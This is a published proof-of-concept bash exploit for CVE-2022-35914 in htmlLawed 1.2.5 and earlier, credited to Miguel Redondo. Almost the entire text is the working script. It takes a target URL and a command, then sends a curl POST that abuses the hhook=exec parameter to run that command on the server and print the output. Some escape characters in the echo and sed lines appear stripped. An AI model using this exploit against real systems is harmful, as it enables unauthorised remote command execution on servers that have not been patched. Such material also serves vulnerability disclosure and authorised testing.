htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.
advisories | CVE-2022-35914
#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
echo -e "n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>n"
exit 1
else
echo -e "n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "n[+] Executing Command: ${cmd}n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep ' [[0-9]+] =>' | sed -E 's/ [[0-9]+] => (.*)<br />/1/')
echo -e "${cmd_output}n"
exit 0
fi
